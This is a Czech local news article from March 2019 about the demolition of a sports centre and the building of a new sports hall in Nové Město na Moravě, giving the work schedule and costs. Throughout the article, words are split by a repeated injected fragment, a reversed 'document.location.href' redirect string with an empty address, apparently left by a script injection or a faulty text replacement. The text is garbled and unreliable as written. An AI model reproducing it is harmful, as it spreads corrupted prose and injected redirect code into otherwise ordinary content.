Rainbow page separator

Stavební práce přinesou největší zátěž mezi květnem a říjnem

Sobota, 16. března 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na největší hluk a dopravní zatížení v souvislosti s budováním spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní haly v novoměstské Tyršově ulici se podle tamní radnice musí lidé připravit mezi le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním květnem a říjnem. V té době dojde k odvozu zbytku sutě ze zbouraného tělovýchovného střediska a v místě začnou vznikat základové konstrukce haly spojené s těžkou montáží.
Demolice původního objektu začala již loni v říjnu, zcela ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova bude v průběhu dubna. Náklady za tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to fázi vycházejí na 3,6 milionu korun. Po ní začnou stavební práce na samotné spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hale. Konstrukce se mají budovat od května do července, v srpnu má být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova montáž železobe[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonového skeletu. Ocelové konstrukce zastřešení a opláštění objektu stavební dělníci podle harmonogramu dokončí v září, přičemž se bude zároveň pracovat na inženýrských sítích a přeložkách. Na podzim dojde na činnosti uvnitř objektu a začátkem roku 2020 pak podle klimatických podmínek začnou venkovní úpravy. Spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hala, jež zahrne rovněž umělou horolezeckou stěnu, má vyjít na celkem 68,5 milionu korun a dokončena bude v květnu příštího roku.